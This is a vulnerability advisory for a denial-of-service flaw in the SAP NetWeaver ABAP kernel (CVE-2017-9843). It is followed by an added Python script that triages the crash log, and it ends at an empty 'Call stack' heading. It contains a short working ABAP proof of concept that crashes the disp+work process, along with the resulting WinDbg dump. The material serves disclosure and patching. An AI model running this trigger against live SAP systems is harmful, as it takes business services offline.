ERPScan advisory ERPSCAN-17-010
Dec 15, 2016 - 12:00 a.m.

SAP NetWeaver AS ABAP disp+work crash

2016-12-15 00:00:00
erpscan.io

EPSS: 0.001 (Low), percentile 48.3%

**Application:** SAP NetWeaver ABAP
**Versions Affected:** SAP KERNEL 7.40 64BIT, disp+work.exe (7400.12.21.30308)
**Vendor URL:** SAP
**Bugs:** DoS
**Reported:** 15.12.2016
**Vendor response:** 16.12.2016
**Date of Public Advisory:** 14.03.2017
**Reference:** SAP Security Note 2406841
**Author:** Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: DoS
Impact: Denial of Service
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-9843

CVSS Information

CVSS Base Score v3: 2.7 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) High (H)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality None (N)
I: Impact to Integrity None (N)
A: Impact to Availability Low (L)

Description

The vulnerability is present in disp+work.exe at JavaScript execution time: a malformed script handed to the kernel's JavaScript engine through the CL_JAVA_SCRIPT class causes a NULL-pointer dereference that terminates the work process (see the proof of concept below).

Business risk

An attacker can use a Denial of Service vulnerability to terminate the process of a vulnerable component. While the process is down, nobody can use the service, which disrupts business processes, causes system downtime and, as a result, damages business reputation.

VULNERABLE PACKAGES

SAP KERNEL 7.40 64BIT, disp+work.exe (7400.12.21.30308)

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2406841.

TECHNICAL DESCRIPTION

Proof of Concept


The following ABAP report hands a malformed script to the kernel's JavaScript engine via CL_JAVA_SCRIPT:

```abap
data SOURCE type STRING.
data JS_PROCESSOR type ref to CL_JAVA_SCRIPT.
data RETURN_VALUE type STRING.

JS_PROCESSOR = CL_JAVA_SCRIPT=>CREATE( ).
SOURCE = ' this (1,2,3,4)'. "!!! null pointer
JS_PROCESSOR->COMPILE( SCRIPT_NAME = 'tmp.JS'
                       SCRIPT      = SOURCE ).
RETURN_VALUE = JS_PROCESSOR->EXECUTE( 'tmp.JS' ).
```

This is the WinDbg log at the crash (output of the `r` command, with rax = 0 and the faulting read at [rax+8]):

```text
0:000> r
rax=0000000000000000 rbx=000007df8014b6e0 rcx=000007df800cf8e0
rdx=000007df80149100 rsi=000007df800cf8e0 rdi=0000000000000000
rip=00000001415d6759 rsp=0000000002149ec0 rbp=0000000000000000
r8=000007df8014b6e0 r9=0000000000000000 r10=0000000000000000
r11=0000000002149e80 r12=000007df801496e0 r13=00000001415ed7f0
r14=000007df80149710 r15=000007df80149100
iopl=0 nv up ei ng nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
disp_work!ComputeThis+0x29:
00000001415d6759 4c8b4008 mov r8,qword ptr [rax+8] ds:0000000000000008=???
```
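An added triage helper (not part of the advisory or of ERPScan's tooling): it parses the WinDbg `r` dump above, recomputes the effective address of the faulting memory operand from the register values, and checks that it lands in the unmapped low region, which is what makes this crash a plain NULL-pointer read (availability impact only, as the CVSS vector states) rather than a controlled memory write. The sample log is the advisory's own dump embedded as a string; the 64 KiB threshold is an assumption about the Windows user-mode NULL-page guard.

```python
import re

# Constructed sample: the `r` output quoted in the advisory's WinDbg log,
# captured at the faulting instruction inside disp_work!ComputeThis.
SAMPLE_WINDBG_LOG = """\
0:000> r
rax=0000000000000000 rbx=000007df8014b6e0 rcx=000007df800cf8e0
rdx=000007df80149100 rsi=000007df800cf8e0 rdi=0000000000000000
rip=00000001415d6759 rsp=0000000002149ec0 rbp=0000000000000000
r8=000007df8014b6e0 r9=0000000000000000 r10=0000000000000000
r11=0000000002149e80 r12=000007df801496e0 r13=00000001415ed7f0
r14=000007df80149710 r15=000007df80149100
iopl=0 nv up ei ng nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
disp_work!ComputeThis+0x29:
00000001415d6759 4c8b4008 mov r8,qword ptr [rax+8] ds:0000000000000008=???
"""

REG_RE = re.compile(r"\b([a-z][a-z0-9]{1,2})=([0-9a-f]+)\b")
SYM_RE = re.compile(r"^(\S+![^\s:]+):$", re.M)
INSN_RE = re.compile(r"^[0-9a-f]{16} [0-9a-f]+ (\w+) (.*?)(?: ds:([0-9a-f]{16})=(\S+))?$", re.M)
MEM_RE = re.compile(r"\[(\w+)(?:([+-])(?:0x)?([0-9a-f]+))?\]")
NULL_PAGE_LIMIT = 0x10000  # assumption: Windows keeps the first 64 KiB unmapped

def triage_crash(log):
    """Describe the faulting memory access, or return None if no fault line is present."""
    regs = {name: int(value, 16) for name, value in REG_RE.findall(log)}
    insn = INSN_RE.search(log)
    mem = MEM_RE.search(insn.group(2)) if insn else None
    if not mem:
        return None
    _, operands, ds_addr, ds_val = insn.groups()
    base, disp = mem.group(1), int(mem.group(3) or "0", 16)
    ea = regs.get(base, 0) + (-disp if mem.group(2) == "-" else disp)
    # Intel syntax: a memory operand before the comma is the destination (write)
    comma = operands.find(",")
    access = "read" if comma != -1 and operands.find("[") > comma else "write"
    if ds_val != "???":
        verdict = "no access violation"
    elif ea < NULL_PAGE_LIMIT:
        verdict = "null-pointer " + access  # DoS-class crash, not a controlled write
    else:
        verdict = "invalid " + access
    sym = SYM_RE.search(log)
    return {"symbol": sym.group(1) if sym else None, "verdict": verdict,
            "base_register": base, "base_value": regs.get(base),
            "effective_address": ea,
            "windbg_address": int(ds_addr, 16) if ds_addr else None}
```

Calling `triage_crash(SAMPLE_WINDBG_LOG)` reports a `null-pointer read` of address 8 through `rax`, matching the `ds:0000000000000008=???` annotation WinDbg printed.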


Call stack
